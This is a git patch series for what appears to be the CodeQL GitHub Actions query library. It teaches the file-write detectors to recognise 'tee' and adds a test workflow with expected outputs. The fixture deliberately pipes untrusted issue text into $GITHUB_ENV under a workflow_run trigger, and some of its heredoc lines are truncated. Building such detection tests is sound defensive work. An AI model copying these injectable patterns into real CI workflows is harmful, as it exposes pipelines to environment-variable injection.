0.1.28 +version: 0.1.29 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 73dff5a1dc8..1070a8e9a97 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.28 +version: 0.1.29 groups: [actions, queries] suites: codeql-suites extractor: javascript From f457537b34e36559e621081691375a14cad0db49 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 17:47:23 +0200 Subject: [PATCH 0444/1267] feat(bash): Add support for tee as a way to write to GITHUB special files --- ql/lib/codeql/actions/Helper.qll | 22 +- .../.github/workflows/multiline2.yml | 89 ++++++ .../library-tests/poisonable_steps.expected | 2 + ql/test/library-tests/test.expected | 265 +++++++++++++++++- 4 files changed, 366 insertions(+), 12 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/multiline2.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index cd964a6621d..f177c645dbd 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -74,9 +74,10 @@ predicate extractVariableAndValue(string raw_content, string key, string value) bindingset[script] predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + regexp = + "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" and content = script.regexpCapture(regexp, 2) ) @@ -100,18 +101,19 @@ predicate singleLineWorkflowCmd(string script, string cmd, string key, string va bindingset[script] predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?msi).*^(cat)\\s*(>>|>)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 3)) and - content = script.regexpCapture(regexp, 5) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and filters = "" or regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 6)) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 7) + content = script.regexpCapture(regexp, 8) ) } @@ -142,13 +144,13 @@ predicate blockFileWrite(string script, string cmd, string file, string content, // "(.*?)" + // - "(\\s*\\}\\s*(>>|>)\\s*(\\S+))\\s*$.*" and + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and content = script .regexpCapture(regexp, 1) .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and cmd = "echo" and filters = "" ) diff --git a/ql/test/library-tests/.github/workflows/multiline2.yml b/ql/test/library-tests/.github/workflows/multiline2.yml new file mode 100644 index 00000000000..1941dd8f22a --- /dev/null +++ b/ql/test/library-tests/.github/workflows/multiline2.yml @@ -0,0 +1,89 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + - run: | + echo "changelog< event.json + ${{ toJson(github.event) }} + EOF + - name: heredoc11 + run: | + cat | tee -a $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL | tee -a $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF | tee -a "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') | tee -a $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | @@ -149,6 +183,7 @@ runExprs | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | @@ -173,6 +208,31 @@ runStepChildren | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | @@ -278,6 +338,108 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | @@ -928,6 +1158,38 @@ nodeLocations | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | @@ -1042,6 +1304,7 @@ nodeLocations | 